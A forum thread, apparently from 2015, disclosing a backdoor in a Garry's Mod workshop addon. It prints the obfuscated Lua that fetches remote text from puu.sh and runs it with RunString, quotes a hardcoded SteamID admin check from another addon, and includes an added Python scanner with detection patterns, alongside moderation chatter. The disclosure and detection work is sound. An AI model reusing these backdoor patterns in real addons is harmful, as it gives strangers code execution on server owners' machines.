[PSA] Backdoor Found in "Suits and Robbers Player Models" Workshop Addon
[QUOTE=_Divine;47357575]My gut tells me it's some sort of backdoor in a workshop addon, but maybe I'm just cynical.[/QUOTE]
Looks like the cynical part of me was right...
Found in the addon: [URL]http://steamcommunity.com/sharedfiles/filedetails/?id=274555791[/URL]
[CODE]local rstr=_G["Ru".."nStr".."ing"];RSTR=RSTR||rstr;
local htf=http.Fetch;
HTF=HTF||htf;
timer.Simple(5, function()
htf("http://puu.sh/gtnOX/57dc004931.txt",function(c)rstr(c)end);
end);[/CODE]
There's no telling what this guy might've done to servers. I doubt there was no malicious intent, considering that he wanted to keep this hidden as well as his two VAC bans:
[URL="http://steamcommunity.com/id/procrastinatorsal"]http://steamcommunity.com/profiles/76561198067739267[/URL]
I'd recommend removing this addon or extract it and remove the backdoor code (in autorun/server/resource.lua). In the future, he might update the broken link as he very well might've in the past: [URL]http://steamcommunity.com/sharedfiles/filedetails/changelog/274555791[/URL]
[U]What I did to find it and how you can check on your own:[/U]
1. Made a batch script to mass extract .gma files:
[CODE]for %%G in (*.gma) do ( "location to gmad.exe" extract -file "%%G" )[/CODE]
2. Saved it in the root of the addons folder.
3. Searched for http.post & http.fetch
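Step 3 as a script (an added example, not part of the original post or the addon): it scans the extracted .lua files for http.Fetch/http.Post and also folds "Ru".."nStr".."ing"-style string concatenation first, so the obfuscated RunString lookup in the snippet above is flagged where a plain text search for RunString would miss it. The rule names and function names are made up for this example.

```python
import re
import sys
from pathlib import Path

# Adjacent Lua string literals joined by "..", e.g. "Ru".."nStr".."ing".
_CONCAT = re.compile(r'''(["'])([^"'\\\n]*)\1\s*\.\.\s*(["'])([^"'\\\n]*)\3''')

# Hypothetical rule set for this example; extend it to suit your server.
RULES = {
    "remote-fetch": re.compile(r"\bhttp\s*\.\s*(Fetch|Post)\b", re.I),
    "dynamic-exec": re.compile(r"\b(RunString(Ex)?|CompileString)\b"),
    "global-table-lookup": re.compile(r"""\b_G\s*\[\s*["']"""),
}

# The snippet quoted in the post above, used here only as scanner input.
SAMPLE = '''local rstr=_G["Ru".."nStr".."ing"];RSTR=RSTR||rstr;
local htf=http.Fetch;
HTF=HTF||htf;
timer.Simple(5, function()
htf("http://puu.sh/gtnOX/57dc004931.txt",function(c)rstr(c)end);
end);'''

def fold_concats(line):
    """Merge concatenated literals until nothing changes."""
    prev = None
    while prev != line:
        prev = line
        line = _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', line)
    return line

def scan_source(src):
    """Return (line number, rule name) for every rule that matches a line."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        folded = fold_concats(line)
        findings += [(lineno, name) for name, rx in RULES.items() if rx.search(folded)]
    return findings

def scan_tree(root):
    """Scan every .lua file under an extracted addons folder."""
    report = {}
    for path in Path(root).rglob("*.lua"):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

if __name__ == "__main__":
    result = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"SAMPLE": scan_source(SAMPLE)}
    for name, hits in result.items():
        print(name, hits)
```

A hit is a lead to read by hand, not a verdict: plenty of legitimate addons call http.Fetch, while the combination of a remote fetch and a dynamic-exec lookup in one file is what this thread found.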
There's also one in the No Lag Textscreens that keeps getting reuploaded everywhere.
The puush was deleted, so I guess it's all good until the addon is updated.
That might be the cause of some people having the error Run string 'puush'
[QUOTE=PwndKilled;47372722]That might be the cause of some people having the error Run string 'puush'[/QUOTE]
Yeah, it was, as it was [URL="http://facepunch.com/showthread.php?p=47357575"]this thread[/URL] that led me to investigate further.
I take it that it requires a certain number of people to report it on the workshop before it gets taken down?
Edit: do his other addons he's uploaded contain backdoors?
[QUOTE=code_gs;47372509]There's also one in the No Lag Textscreens that keeps getting reuploaded everywhere.[/QUOTE]
This and the addon from OP are now banned. I tried another addon from [url]http://steamcommunity.com/id/procrastinatorsal[/url] and I didn't find any backdoors in it.
[QUOTE=Robotboy655;47372884]This and the addon from OP are now banned. I tried another addon from [URL]http://steamcommunity.com/id/procrastinatorsal[/URL] and I didn't find any backdoors in it.[/QUOTE]
Yay, thanks! Although, there were over 60k subscribers to the addon and countless servers use them.
Getting ready for these:
[IMG]http://cdn.auroraen.com/image/1a3Y1Q3p2o10/Image 2015-03-22 at 3.43.56 AM.png[/IMG]
I hope this is not breaking any rules or anything, but here's the content w/ the backdoor removed if any server owners need it.
[URL]http://cdn.auroraen.com/0d2d1Q0E2J2V/suitsandrobbers.zip[/URL]
Is it against the rules to have backdoors? If not, it should be.
[QUOTE=Baron von Hax;47373234]Is it against the rules to have backdoors? If not, it should be.[/QUOTE]
[url]http://wiki.garrysmod.com/page/Steam_Workshop_Rules#Addons[/url]
[QUOTE=Robotboy655;47373295][url]http://wiki.garrysmod.com/page/Steam_Workshop_Rules#Addons[/url][/QUOTE]
[quote=GarrysModWikiRulesForAddons]
Avoid requiring other addons - In some cases this is permissible - like if it's an addon for a gamemode. But making a weapon that requires another weapon to function is not allowed. If your addon does require another addon - it shouldn't error if that addon isn't present. It should just do nothing.
[/quote]
Soooo, what about the M9K weapon addons and such? Does it count for weapon bases?
M9K has the weapons included. However, addons like WAC (?) and gbombs, which (both) require a base addon, would violate this rule. Always wondered about this rule, but never bothered to ask.
The wording of it makes it sound like a guideline rather than a hard rule.
Thanks for reporting that ^^
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=409961186[/url]
This script also has exactly the same backdoor.
[editline]22nd March 2015[/editline]
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=408243366[/url]
[code]
function fnafgmcheckadmin(pl)
	if (pl:SteamID()=="STEAM_0:1:18280147" or pl:SteamID()=="STEAM_0:1:35715092" or pl:SteamID()=="STEAM_0:1:51964687") then
		return true
	end
	return false
end
[/code]
Doesn't surprise me Defcon is involved...
Or that there is a FNAF gamemode with malicious code
[QUOTE=edgarasf123;47373896][url]http://steamcommunity.com/sharedfiles/filedetails/?id=409961186[/url]
This script also has exactly the same backdoor.
[/QUOTE]
That addon is just the suits and robbers pack and another pack in one. Isn't that against the rules itself?
Edit: It just got banned.
[QUOTE=PwndKilled;47372722]That might be the cause of some people having the error Run string 'puush'[/QUOTE]
Oh shit some guy reported that problem and blamed my Addon
[QUOTE=_Divine;47372486]Looks like the cynical part of me was right...
Found in the addon: [URL]http://steamcommunity.com/sharedfiles/filedetails/?id=274555791[/URL]
[CODE]local rstr=_G["Ru".."nStr".."ing"];RSTR=RSTR||rstr;
local htf=http.Fetch;
HTF=HTF||htf;
timer.Simple(5, function()
htf("http://puu.sh/gtnOX/57dc004931.txt",function(c)rstr(c)end);
end);[/CODE]
There's no telling what this guy might've done to servers. I doubt there was no malicious intent, considering that he wanted to keep this hidden as well as his two VAC bans:
[URL="http://steamcommunity.com/id/procrastinatorsal"]http://steamcommunity.com/profiles/76561198067739267[/URL]
I'd recommend removing this addon or extract it and remove the backdoor code (in autorun/server/resource.lua). In the future, he might update the broken link as he very well might've in the past: [URL]http://steamcommunity.com/sharedfiles/filedetails/changelog/274555791[/URL]
[U]What I did to find it and how you can check on your own:[/U]
1. Made a batch script to mass extract .gma files:
[CODE]for %%G in (*.gma) do ( "location to gmad.exe" extract -file "%%G" )[/CODE]
2. Saved it in the root of the addons folder.
3. Searched for http.post & http.fetch[/QUOTE]
Tisk Tisk. Naughty kids.
[QUOTE=Robotboy655;47373295][url]http://wiki.garrysmod.com/page/Steam_Workshop_Rules#Addons[/url][/QUOTE]
[quote]Your submission must not contain pornographic content. (e.g. pornographic sprays/decals, nudity)[/quote]
Does a Drilldo fall under this category?
[QUOTE=code_gs;47374840]Does a Drilldo fall under this category?[/QUOTE]
It does.
[QUOTE=Robotboy655;47374902]It does.[/QUOTE]
Fuck
[QUOTE=Robotboy655;47374902]It does.[/QUOTE]
[url]http://steamcommunity.com/workshop/browse/?appid=4000&searchtext=dildo&childpublishedfileid=0&browsesort=textsearch&section=readytouseitems[/url]
164 dildos, you're going to have a busy day :quagmire:.
I am not going to ban non reported dupes/saves, it will take me a full day to ban 160 dildo saves and 300 sex dupes.
Workshop moderation tools kind of SUCK A HELLA LOT.
What about all these spam guides that keep being made that have nothing to do with Garry's Mod.
[QUOTE=Robotboy655;47375223]300 sex dupes.[/QUOTE]
I think you are lowballing how many exist
[QUOTE=The Commander;47375539]What about all these spam guides that keep being made that have nothing to do with Garry's Mod.[/QUOTE]
Report them.
[editline]22nd March 2015[/editline]
Guides are even worse because Valve does not use <a> for guide links, so I can even mass open the pages using Middle mouse click.
Oh lord.
And I was thinking what's causing the puu.sh error on every server start.
Glad you found it.
[QUOTE=Robotboy655;47375223]I am not going to ban non reported dupes/saves, it will take me a full day to ban 160 dildo saves and 300 sex dupes.
Workshop moderation tools kind of SUCK A HELLA LOT.[/QUOTE]
Surely when you click on "ban" it gives you a link with the id?
Why not farm the ids and make a Lua script, or GreaseMonkey script or something else which lets you mass ban or mark x to ban which saves to a file, and when you click on ban selected it reads the txt, bans and saves them in a banned folder?